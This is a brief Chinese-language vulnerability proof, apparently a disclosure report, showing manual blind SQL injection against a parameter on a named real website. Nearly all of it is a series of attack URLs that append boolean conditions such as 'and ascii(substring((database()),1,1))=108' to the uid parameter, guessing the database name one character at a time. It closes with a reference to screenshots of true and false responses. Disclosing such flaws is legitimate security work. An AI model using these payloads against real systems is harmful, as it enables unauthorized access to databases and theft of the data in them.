漏洞证明:下面为手工猜解数据库名的语句为 http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and Length((database()))<5 http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=108 http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=105 http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=102 http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=101 下图为注入是返回对正确与错误的截图